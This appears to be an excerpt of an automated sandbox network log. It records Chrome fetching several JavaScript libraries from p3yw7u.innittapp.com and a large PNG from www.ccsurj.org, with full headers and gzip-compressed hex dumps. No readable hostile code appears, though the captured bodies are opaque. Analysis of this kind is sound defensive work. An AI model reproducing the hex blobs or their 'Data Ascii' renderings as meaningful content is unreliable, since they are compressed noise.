                                          2025-01-12 00:17:27 UTC1929INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 59 5b 6f 13 47 14 7e cf af 18 52 84 77 61 e3 38 54 b4 52 4c 5a ca a5 2a 12 15 55 8b d4 07 84 aa 8d 3d 4e b6 ac 77 a3 dd 75 12 44 23 45 22 a1 81 10 9c 16 28 24 10 c2 25 10 a0 e0 b4 e2 12 93 0b bf c6 b3 b6 ff 45 cf cc ec d5 f6 7a 1d da 48 9d 17 ef ec 9c 39 97 ef 5c e6 cc ba 77 ff fe 2e b4 1f 21 fb 6d 89 cc de 42 42 fd c1 7c ed d9 2b 52 7c 5d 29 5f 45 96 3e d2 df 77 28 25 32 8a 23 78 5c ce 8f a8 18 21 b4 57 e8 fe 44 c9 76 8b c9 af 55 5d b6 04 31 4d 09 8e 8c c8 86 9c 47 fa e0 cf a8 1f 5d 84 ad 3f 28 59 4c b7 4b 83 ba 65 e9 79 36 4d c8 05 4b 4f 48 39 ba ef 7b 65 68 d8 ea 4f fd d2 27 99 74 e9 90 94 51 75 13 f7 9b 58 c5 19 4b 37 26 80 69 6f d7 de 64 4e e3 62 d0 00 ca 15 b4 8c a5 e8 1a 12 40 8a 88 2e 76 81 2e 68 54 36 10 56 61 d5
                                          Data Ascii: Y[oG~Rwa8TRLZ*U=NwuD#E"($%EzH9\w.!mBB|+R|])_E>w(%2#x\!WDvU]1MG]?(YLKey6MKOH9{ehO'tQuXK7&iodNb@.v.hT6Va


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          138192.168.2.449892103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC386OUTGET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:27 UTC719INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 11957
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"64d5b951-b083"
                                          Date: Sun, 29 Dec 2024 00:01:01 GMT
                                          Last-Modified: Fri, 11 Aug 2023 04:30:09 GMT
                                          Expires: Tue, 28 Jan 2025 00:01:01 GMT
                                          Age: 1210585
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-10
                                          X-Cdn-Request-ID: 239cb59a2c7023fc61a2b6270666a524
                                          2025-01-12 00:17:27 UTC11957INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d fd 73 db b8 d1 f0 ef fd 2b 64 4e eb 23 2d 4a 96 92 6b 9f 96 0a a5 c9 39 ce 9d 7b f1 25 4d dc bb e4 5c 4f 06 e2 87 44 5b 16 15 4a 8a e3 58 fa df 9f dd 05 40 02 20 28 3b b9 74 9e 77 de 99 c4 22 f1 b1 58 2c 16 8b c5 62 b1 3c 3c f8 53 eb a0 f5 e6 26 5b 24 45 eb 51 f7 7f ba 3d 7c 3f cd c7 d9 2c 69 ad f2 75 34 6d 2d 67 59 0c 99 6c 1e b7 d2 82 5d 27 37 79 71 d5 ba c9 56 d3 d6 94 15 f1 0d 2b 92 16 8b a2 64 96 14 6c 95 c4 ad 55 c1 e6 cb 6c 95 e5 f3 25 80 42 68 d3 d5 6a 11 1c 1e de dc dc 74 b3 98 cd 27 49 91 77 d7 cb 43 0e 17 7e a9 f1 43 51 f8 28 5f dc 16 d9 64 ba 6a 3d ea f5 7b 1d f8 f3 bd df fa 75 c6 e2 ec 3a 2b 5a 3f 43 93 33 76 bd c8 e2 0c 0b 9f 4d 93 56 f6 ac 04 b9 a3 31 01 fd 45 16 25 f3 25 60 b9 9e 63 9f 7e 7c f5 a2 b5 df
                                          Data Ascii: }s+dN#-Jk9{%M\OD[JX@ (;tw"X,b<<S&[$EQ=|?,iu4m-gYl]'7yqV+dlUl%Bhjt'IwC~CQ(_dj={u:+Z?C3vMV1E%%`c~|


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          139192.168.2.449889103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC380OUTGET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:27 UTC718INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 4031
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-05
                                          ETag: W/"60f60fb5-43bc"
                                          Date: Sat, 28 Dec 2024 22:12:32 GMT
                                          Last-Modified: Mon, 19 Jul 2021 23:50:13 GMT
                                          Expires: Mon, 27 Jan 2025 22:12:32 GMT
                                          Age: 1217094
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-05
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-13
                                          X-Cdn-Request-ID: 80dd80fcdd37e502224f1988c0eed32c
                                          2025-01-12 00:17:27 UTC4031INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 1b fd 53 1b c7 f5 77 fe 8a 8b 26 63 04 16 92 d3 9f 3a a2 d4 05 a1 26 34 36 30 16 6e c7 f5 78 34 42 3a b0 12 71 a7 b9 3b d9 61 1c 66 14 d7 89 f1 b7 27 f1 77 28 8d 1d d7 a6 49 01 3b e9 d8 18 70 fc c7 94 93 c4 4f f9 17 ba 6f f7 76 6f 77 6f 57 12 ce 47 d3 99 ee 30 e8 b4 bb ef ed db b7 6f df e7 29 d5 df df 63 c0 5f aa 67 a6 66 15 bd b2 6d 19 87 73 65 cf cc d8 73 a6 17 ef 33 ce f4 2c f4 f4 84 3d c9 aa 63 7b b6 37 5f 35 8d 21 34 d6 63 a0 96 ea ef 37 5a eb cf 1b 4f cf fa d7 ce 36 6e 3e f1 af 5f f9 7e fb 9e 7f fd 72 63 f5 ef 80 18 e6 e4 8e 8d 67 de 39 32 31 3e f6 e7 6c fe dd ec b1 b4 11 cb e7 f2 99 89 c3 d9 a9 58 82 21 21 20 7e 7d 1b c0 17 3f f7 b7 36 5b af 96 1b 57 19 92 cc c4 f8 78 36 33 35 36 31 9e ff e3 f0 a1 a3 59 84 25 a3 01
                                          Data Ascii: Sw&c:&460nx4B:q;af'w(I;pOovowoWG0o)c_gfmses3,=c{7_5!4c7ZO6n>_~rcg921>lX!! ~}?6[Wx63561Y%


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          140192.168.2.449891103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:26 UTC389OUTGET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:27 UTC720INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 33545
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: W/"5d848f4f-176d4"
                                          Date: Sun, 29 Dec 2024 00:00:59 GMT
                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                          Expires: Tue, 28 Jan 2025 00:00:59 GMT
                                          Age: 1210587
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-10
                                          X-Cdn-Request-ID: 460fdf631835e47fbac5b51d86c5a64c
                                          2025-01-12 00:17:27 UTC15664INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dc bd 79 7b e3 c6 b1 2e fe ff f9 14 22 e2 43 03 c3 16 25 8e ed dc 13 70 20 3e b6 c7 8e ed 78 4b 66 1c 3b a1 68 3f d8 48 42 e2 26 92 1a 8d 2c 32 9f fd d6 5b d5 dd 68 2c 1c 3b e7 dc df f2 5c 27 23 62 69 f4 5a 5d 5b d7 72 f1 ac 73 76 f3 d7 fb 7c fb 78 f6 66 d0 1f 0c fa 1f 9c 1d ce fc 34 38 7b 7e 79 f9 91 a2 bf 83 8f cc fb cf d7 f7 ab 2c de 17 eb 95 3a fb 72 95 f6 a9 e0 cd 1d de f4 d7 db d9 c5 a2 48 f3 d5 2e 3f 7b 76 f1 1f 9d e9 fd 2a 45 39 3f 56 49 f0 e4 ad 93 9b 3c dd 7b 51 b4 7f dc e4 eb e9 d9 72 9d dd 2f f2 6e f7 c4 8b 7e fe 76 b3 de ee 77 a3 ea 6d 14 f7 b3 75 7a bf cc 57 fb 51 42 35 77 2e 83 b0 6c 28 78 2a a6 7e a7 2c 12 ec e7 db f5 c3 d9 2a 7f 38 fb 6c bb 5d 6f 7d 4f 8f 62 9b df dd 17 db 7c 77 16 9f 3d 14 ab 8c ca 3c 14 fb
                                          Data Ascii: y{."C%p >xKf;h?HB&,2[h,;\'#biZ][rsv|xf48{~y,:rH.?{v*E9?VI<{Qr/n~vwmuzWQB5w.l(x*~,*8l]o}Ob|w=<
                                          2025-01-12 00:17:27 UTC16384INData Raw: 72 f6 51 e9 90 61 e0 db 8e e8 5d df 79 bd cc ca 8b 3d 68 12 92 9c a8 76 7e bf 92 65 72 b9 96 aa c7 56 19 1f 47 b8 17 e8 0c c1 77 15 ab 78 a1 95 88 7e ed 49 5f 5a e7 43 2a fb 1d cc eb d4 ae 58 de 2f 2a 6e 90 5a 95 27 fb 3d 2f 35 b5 0e 15 82 d1 08 6b 2b 62 55 ec 5e e9 1a 38 a5 43 a5 55 c2 af c7 60 98 8d 6a 62 84 9f 9b ec ca 4d f5 b7 56 7c c0 59 ed 84 b4 94 36 f8 41 e0 4b 57 3f 14 b5 3a db 8c aa 03 04 af dd 52 0a 73 d9 e6 7a c3 46 75 f5 44 dc a5 e7 b7 1c 22 0d 2b be 36 b4 0a 5a 9d 11 4b 26 6a 18 f6 f3 a5 48 61 55 c7 1c 88 fa 01 06 22 43 68 25 2c 00 b8 4a c4 2b 29 3c f2 d9 cf 8f 8f 15 04 28 2b ab 60 62 34 b1 28 aa f9 1c 7e d0 9c df c8 86 82 b4 8f 1c 64 d3 7c 29 b3 55 42 16 58 f6 51 1c 87 89 89 e2 25 6d c2 3d dc 82 11 6f b4 44 87 47 b0 a4 3a 92 21 98 5b 68 fc
                                          Data Ascii: rQa]y=hv~erVGwx~I_ZC*X/*nZ'=/5k+bU^8CU`jbMV|Y6AKW?:RszFuD"+6ZK&jHaU"Ch%,J+)<(+`b4(~d|)UBXQ%m=oDG:![h
                                          2025-01-12 00:17:27 UTC1497INData Raw: 1d fc 3a 24 1c 56 49 32 0c d0 40 a1 6c 03 b6 3a bd 60 32 1b f4 58 f8 11 56 f8 41 42 07 2c 92 20 45 5d 66 05 74 19 f1 c7 a2 ad 79 09 69 17 74 9e 93 c6 6c 15 0d 19 9b 99 35 23 00 d3 d9 85 c4 c3 01 f3 94 c2 f4 79 15 ed 11 8f 15 69 21 dd c4 69 05 c3 4a e3 3e 5f 1d cd 17 eb 23 6c 23 e6 9c 4f 68 0a 76 2a 9c 92 54 18 a8 ec 91 be 82 84 bc 0a 6a 9e 38 65 fb 9d 1a b7 f8 79 97 02 4c 12 f3 f0 c2 c9 2d 1b 93 f5 41 fb 54 86 96 d9 44 bc 9a d8 b9 87 7f fc ba 33 61 4e dd 24 ad 5d 80 17 0b a7 fc 18 81 ac 23 c3 0e f2 7c 42 46 69 1d c1 bc 45 4f 3c 0f f4 c4 5b 8d a0 b4 22 2e 60 3b ab a9 7c 12 75 5c 30 f5 21 c6 e6 10 7a 70 dc 3c b4 61 c5 c6 d9 b0 68 80 55 c4 e0 8e 47 09 07 06 28 36 04 2b 5e 2e f3 09 7f a1 e3 c7 e4 ae f8 2d 15 1a 9f 26 81 66 43 03 a6 0e 46 76 53 2d 27 55 67 08
                                          Data Ascii: :$VI2@l:`2XVAB, E]ftyitl5#yi!iJ>_#l#Ohv*Tj8eyL-ATD3aN$]#|BFiEO<[".`;|u\0!zp<ahUG(6+^.-&fCFvS-'Ug


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          141192.168.2.449893154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:27 UTC401OUTGET /__local/1/3B/E2/0973C37817A5D1570D2AED02D91_1A4F1A29_14F98C.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:27 UTC305INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:27 GMT
                                          Content-Type: image/png
                                          Content-Length: 1374604
                                          Last-Modified: Fri, 10 Jan 2025 07:04:29 GMT
                                          Connection: close
                                          ETag: "6780c67d-14f98c"
                                          Expires: Tue, 11 Feb 2025 00:17:27 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:27 UTC16079INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 f4 00 00 03 b7 08 02 00 00 00 2b b0 8d 74 00 00 00 09 70 48 59 73 00 00 21 d5 00 00 21 d5 01 04 9c b4 9d 00 00 20 00 49 44 41 54 78 9c bc bd db 92 24 39 92 25 a6 0a 98 b9 47 e4 ad b2 6e 9d 59 97 ee ea ed 9e d9 91 a1 90 df 40 ae 70 c9 cf e2 13 5f f8 7f f3 07 f3 d8 2f 33 d2 95 19 e1 ee 66 d0 7d 50 c7 f1 03 55 78 54 76 ef 70 4c 4a b2 2c cc 61 80 5e 8e 2a 14 8a 8b e9 ff f7 ff fe 3f aa aa aa 66 66 66 22 22 22 a5 14 11 f1 3f 55 55 b5 7a 01 11 a9 b5 6e db b6 ef 97 cb e5 b2 2c cb e5 72 39 1e 8f e7 f3 b9 5c 5f 1c de 15 91 d6 5a 6b ad d6 5a 4a d9 f7 5d 55 6b ad 66 f6 7c 39 1f 0e 07 94 f4 7f f7 7d f7 5f 9d 06 55 f5 1a cc 6c df f7 65 59 5a 6b a5 14 33 f3 3a cd ac d6 ea 05 9c 54 af ca cc ae f7 72 bd f0 93 df a8
                                          Data Ascii: PNGIHDR+tpHYs!! IDATx$9%GnY@p_/3f}PUxTvpLJ,a^*?fff"""?UUzn,r9\_ZkZJ]Ukf|9}_UleYZk3:Tr
                                          2025-01-12 00:17:27 UTC16384INData Raw: 17 b8 e0 fa 79 44 01 2e f0 2f 73 8d 68 83 4b 86 9a 8d 46 02 3a a6 c9 24 3b 96 f4 70 fa dc fa e4 8f a5 63 ea 39 42 0a 80 09 d5 4e 61 1f 0a 64 09 4c ab 0a 72 cb 5d cf 94 0b 94 cc ad 4f e9 c9 e4 c9 98 19 f9 cd 57 c2 bb 53 7e 85 a0 7b 4f 62 10 45 a1 35 8a ee 06 7d 39 0c 17 e3 6c 5a 20 18 7f 62 f8 61 63 8c 08 f9 07 4f 12 84 a6 63 82 0f e5 39 cf c8 19 ea 29 5c 0b 4d b6 e3 21 2b 1d 69 5f 06 06 f3 c5 1c 49 1f 56 35 da d3 0b 66 3d 7a 43 8c 1b ca 70 bb ec f7 32 e5 ac 29 30 3b fd 14 8a 8c 7e 26 fb 10 28 2b 0a 61 38 e1 d5 03 09 0b 84 65 78 70 eb fe 75 16 a5 3d 93 66 e6 a9 e4 20 e7 7e 53 cc 54 44 7b a8 a9 66 2d d4 39 bd ee 29 b4 8c ab d6 33 c0 02 01 e8 0b f0 93 d2 36 78 e6 31 10 e0 b5 79 53 99 5a 47 78 51 9a b9 a2 ee 1e ff b2 45 c8 a8 b5 29 a7 ce 80 99 89 ff 37 1a 85
                                          Data Ascii: yD./shKF:$;pc9BNadLr]OWS~{ObE5}9lZ bacOc9)\M!+i_IV5f=zCp2)0;~&(+a8expu=f ~STD{f-9)36x1ySZGxQE)7
                                          2025-01-12 00:17:28 UTC16384INData Raw: 78 c0 dc 83 a9 14 c2 9c ea 1d a1 00 c3 55 1b 27 72 94 52 44 8c 63 7e 3c 25 b3 58 f6 b0 05 6c f7 f4 e5 71 09 11 1d cd 62 22 91 d6 4d d2 2e 78 0f bd c6 3d a2 29 78 68 99 2e e0 19 86 c1 f7 e8 63 26 98 55 d9 56 c3 19 b8 17 0e 09 c3 d0 8f da da 25 47 3a 56 d3 2d 55 17 17 9c 50 68 3d 76 a2 33 cc 90 72 ac d5 e3 9a da fb 42 78 e6 c0 e2 00 6c a0 00 40 28 fe 21 64 c7 16 dc 9b a5 f7 c0 70 4f b5 70 33 2d f8 5f ea 94 c9 0d 06 0a a2 b5 30 6d f4 b3 23 de 07 a6 62 a2 a4 76 a1 58 5a b9 10 72 8a 40 38 c0 d6 4f a2 b3 65 96 f3 67 3f 0c 03 61 3a a2 c2 19 50 f1 55 d8 bf d0 63 66 09 54 99 73 72 fa e9 19 ed 00 15 b3 a4 f7 e2 c0 c0 b2 47 85 c0 33 67 a0 02 e9 97 18 35 f4 1b 00 0e 6c 16 ea 6b 67 c9 bd b4 04 72 84 de d1 1d f3 09 2b 9f 25 f2 cd a2 e2 8c b6 9c ed f7 a5 95 fb 96 01 d5
                                          Data Ascii: xU'rRDc~<%Xlqb"M.x=)xh.c&UV%G:V-UPh=v3rBxl@(!dpOp3-_0m#bvXZr@8Oeg?a:PUcfTsrG3g5lkgr+%
                                          2025-01-12 00:17:28 UTC16384INData Raw: 39 c8 cb 6c 7d 3e ab 32 b8 00 b3 8d 73 e1 36 fb da dc b5 93 46 55 5f 7f fd f5 cd 66 33 8e e3 e7 9f 7f 8e c5 c0 b4 4a db ed 36 a7 95 99 0d c3 6a 1c c7 f5 7a 5b 4a b9 bd bd 7d f7 dd 77 ff e0 0f fe b3 77 de 79 b4 3f 94 52 46 df 8e 3a 4d 93 d9 e4 2b f0 5a bd 4c 2c d5 1e fb fd 86 7a 7b 96 8d bf c9 e7 a7 0e 7d 23 f1 34 1d 0f 90 7b f2 e4 c9 cf 7e f6 b3 8f 3f fe 78 b3 d9 dc de de ba 3f 7f 7b 7b eb cb 4e ae b4 99 04 be 40 35 89 81 31 a4 b2 2e 9e b1 1d 12 62 82 15 e0 54 0b 18 5a 48 c1 42 be b0 da 04 d5 c4 11 43 16 3a ad f9 23 f8 76 e0 74 5f a5 09 95 3f 56 3a 9d 0f 7a 8a 65 09 a0 4b eb 21 b3 71 8f 3a de 45 6e af 8a 91 39 99 61 11 4d ed 5e 1d 1e bf 74 0a 4e 5a 95 dd fe e4 ef 6d f4 35 b9 24 29 25 4b 62 93 a6 9c 93 c9 41 4a 52 d9 97 fd 61 9a 92 a5 67 4f af 37 97 db fd
                                          Data Ascii: 9l}>2s6FU_f3J6jz[J}wwy?RF:M+ZL,z{}#4{~?x?{{N@51.bTZHBC:#vt_?V:zeK!q:En9aM^tNZm5$)%KbAJRagO7
                                          2025-01-12 00:17:28 UTC16384INData Raw: cf 7e fa d3 7f f9 e4 93 4f 38 0e 8f 1f bd a9 d7 f9 2c 79 79 f3 ed b7 3e fc f0 c3 47 8f 1e c5 81 bf f8 e2 8b 5f fd ea 57 e3 38 46 e2 bb bb bb f5 18 70 e4 c8 a3 88 a4 3c e7 9c 6f 6f 6f 73 49 b7 a9 f9 7a c6 71 d4 9d 77 02 45 f1 64 29 97 91 7c 5c ef 14 63 98 0b ac 32 02 5b 97 5b 6b d2 72 54 cb 87 48 47 5b 18 b8 a0 2d 8d c7 90 81 db ae db 8e ba 45 bf 1a 62 8c 77 77 77 31 c6 e3 f1 a8 02 f9 e8 d1 23 81 bb a7 05 0e 34 92 2d 8e e5 cc 22 43 09 4a b1 48 ac d3 ac b3 de 91 14 e3 32 4d 94 f3 18 63 9a e7 fd 38 b2 48 5e 96 87 0f 1e 2c cb 12 6c 0a 44 6b d2 3a 95 03 fd 1d ca 13 1d 5c 28 97 dc ae f8 2a b8 b0 1d 26 da c8 8a a3 b2 bd 81 45 62 08 5c 76 5c af 98 62 26 bb f8 84 ce 99 f7 42 08 b1 3e dc 38 84 b0 30 db f5 4d b1 ec 70 56 96 3a 1f e1 30 8f 9c 28 cd b3 7d 4e 39 ef c6
                                          Data Ascii: ~O8,yy>G_W8Fp<ooosIzqwEd)|\c2[[krTHG[-Ebwww1#4-"CJH2Mc8H^,lDk:\(*&Eb\v\b&B>80MpV:0(}N9
                                          2025-01-12 00:17:28 UTC16384INData Raw: e5 53 68 d3 20 73 b9 a7 9c 31 4a 26 bc d5 ad d3 4e 51 8c 24 13 4c c7 31 77 9c ea 04 5e dc a4 66 81 51 c5 82 df b4 7b 44 e6 9b cd 64 24 1f 2b 23 e1 fe b1 44 39 6c 44 dd af bc 3f b6 92 62 cc 38 f7 e8 0e 2a 12 fc d8 88 41 ea f0 12 71 0a b7 d3 06 0f 25 cb 20 3b a5 42 9c 14 a6 46 2f b0 6b 3b 65 be 66 03 3d 48 0e 5e 62 b0 aa ea 3b 79 d0 7e 1f 69 e2 d9 1f 28 23 cb 2e 2e 9b 46 a7 65 64 5f 78 8d cd ae 4c f1 52 ca 76 db 6a ad 8e 22 d4 b7 b1 22 c7 5c e8 8e 1c 06 58 fc ea 26 b0 ef 58 9f 57 d5 4a 69 c9 d8 7b 09 08 64 b1 61 5f 34 c4 d4 81 58 0f c7 2c 7f 92 59 d9 19 79 35 40 32 f3 79 d0 98 4a 81 18 99 b7 25 83 f7 b8 b5 32 76 b3 c3 7e 00 b7 97 52 6e b7 db cf 9f 3f df df df 55 f5 f9 7c fe eb bf fe eb bf ff fb bf 73 7e 35 df 12 ef a1 e8 46 a3 00 e1 ca c8 76 16 24 2e 8c 74
                                          Data Ascii: Sh s1J&NQ$L1w^fQ{Dd$+#D9lD?b8*Aq% ;BF/k;ef=H^b;y~i(#..Fed_xLRvj""\X&XWJi{da_4X,Yy5@2yJ%2v~Rn?U|s~5Fv$.t
                                          2025-01-12 00:17:28 UTC16384INData Raw: 25 84 4a a9 5d 40 5f 4a 69 9f 47 c4 0b 9b 58 ea c8 50 87 08 5f 19 fb fe cd 9a aa d4 5a 46 e0 e3 f5 7c ba 36 f4 21 29 1f 7a 91 dd 21 31 b3 26 d2 45 4c a4 9b 75 91 fe 7a 7d 12 1b f4 81 ba a2 5a c1 88 bd 9b 53 8a 18 ba f4 2e 3e 68 57 04 88 ef fa ec 08 7f 09 89 6d c2 7c d0 69 6d 79 d8 22 cd cc 3c 7b 73 ef d2 fb a7 8c 15 e0 1c c6 0e 81 16 ac e3 19 9d 69 69 73 26 34 14 8f 14 38 57 b5 d6 9e cf 27 36 12 1b f9 a5 60 1a c2 c3 11 82 e2 84 49 cc f7 41 99 da 30 0b 4a d9 55 3c 96 ac 7d 68 c8 7a 6a 66 da 4d 44 ba 4c 43 2b a5 74 3f 52 4b f9 0f a5 16 d3 7d 1b 5e b0 12 32 8b ca 4a fb f3 fb a0 a0 11 14 a8 5a 54 d4 46 ec aa b5 66 ad ab 49 b7 78 b1 04 f0 00 6c eb ec c6 2c 15 4d 80 93 e5 85 34 54 ac c9 da 01 5d 40 d1 e3 00 36 37 ab aa e5 f1 e8 b4 22 81 f6 f3 22 7c d0 1d d0 47
                                          Data Ascii: %J]@_JiGXP_ZF|6!)z!1&ELuz}ZS.>hWm|imy"<{siis&48W'6`IA0JU<}hzjfMDLC+t?RK}^2JZTFfIxl,M4T]@67""|G
                                          2025-01-12 00:17:28 UTC16384INData Raw: 87 24 4d a9 d3 a4 97 12 ff 4f 17 93 69 65 7b b4 16 d4 2f 2c 7d 55 bc 58 3c d3 9f f8 e1 97 6d 4e 9b 7a dd f5 2f 16 0c f3 0a 80 e4 e5 49 2a 8b 69 51 69 fa 02 6c 66 24 7e 7d 38 cd 25 22 22 fb e8 49 49 03 7c 8d 96 17 b4 f8 b2 f8 38 2d 8a c8 8b c5 ed d9 d1 88 4f e8 04 44 bb 68 77 c2 ca 91 27 d2 97 65 69 7e 24 22 d9 b6 ed fd ed 5d 55 db 72 6b 94 07 a1 b5 b6 ac 2b 23 c7 28 24 c7 cc 5c 06 42 c4 aa 18 d9 0a 53 e1 79 9c 34 b3 27 14 0d d2 da fd 0c f8 a9 56 16 c9 08 4a d5 54 8f 9b 9b 6a fb 69 f1 c9 bf a6 7e eb c3 da 69 d2 f6 51 62 6a c0 09 67 25 8f 49 aa cf 0f 99 4b 6b a7 18 60 9a bc f0 21 ad 09 f1 b7 8d 61 d2 40 82 f5 43 92 bc c6 0b 06 48 12 27 71 39 bc b8 97 d9 4d 28 7b 3c f3 7f c5 bc 8c 6e ac a3 71 e2 e7 75 39 ed 5b 74 ad c5 5c 4c bd d7 4e 2b 32 a3 34 3d 53 c9 a2
                                          Data Ascii: $MOie{/,}UX<mNz/I*iQilf$~}8%""II|8-ODhw'ei~$"]Urk+#($\BSy4'VJTji~iQbjg%IKk`!a@CH'q9M({<nqu9[t\LN+24=S
                                          2025-01-12 00:17:28 UTC16384INData Raw: 5a 64 a2 92 41 38 19 42 d2 06 39 3e eb da 8a d4 0d 06 70 b0 ad b5 65 2c b0 2e 67 c5 4d 37 0e 06 d7 f2 39 4e 60 f0 6c a5 f6 1c 9c d6 75 56 3a 37 67 32 09 6c 12 9c c2 b8 b6 ac 04 fc 4f c4 89 4d 1f da 26 ce e0 8e 0d 5a fc 20 06 42 bd 2c c1 cd cc 68 05 3d e4 c2 57 eb dc 6a 5f 9a 87 86 0e b6 21 8d ca a2 94 2d 4d 19 b4 95 c1 83 91 d6 7a d4 5d d7 71 1d 0d 37 de 33 f1 b1 61 4a 71 f5 71 50 a1 ac 99 85 12 66 6a 97 bb 4d 28 18 cc 0c 47 41 e0 e7 8d 79 d9 e8 db da 8d 4e b5 3a 3c 13 48 ee f2 4a b3 62 c7 c5 84 43 69 42 4a 21 30 ce 8e 72 ed b4 23 32 18 b0 82 f6 85 63 d1 d2 99 b7 69 f3 44 cb e8 38 18 47 1b 7b c6 43 e4 c8 c4 25 75 c7 ea 53 e9 4f 76 f0 cc 81 68 04 73 03 b3 ac 42 66 8d 51 2d 12 ae e4 ec 37 20 5d 7e 36 ce 43 95 44 85 54 04 0b 68 02 09 81 70 08 a1 b8 55 28 90
                                          Data Ascii: ZdA8B9>pe,.gM79N`luV:7g2lOM&Z B,h=Wj_!-Mz]q73aJqqPfjM(GAyN:<HJbCiBJ!0r#2ciD8G{C%uSOvhsBfQ-7 ]~6CDThpU(
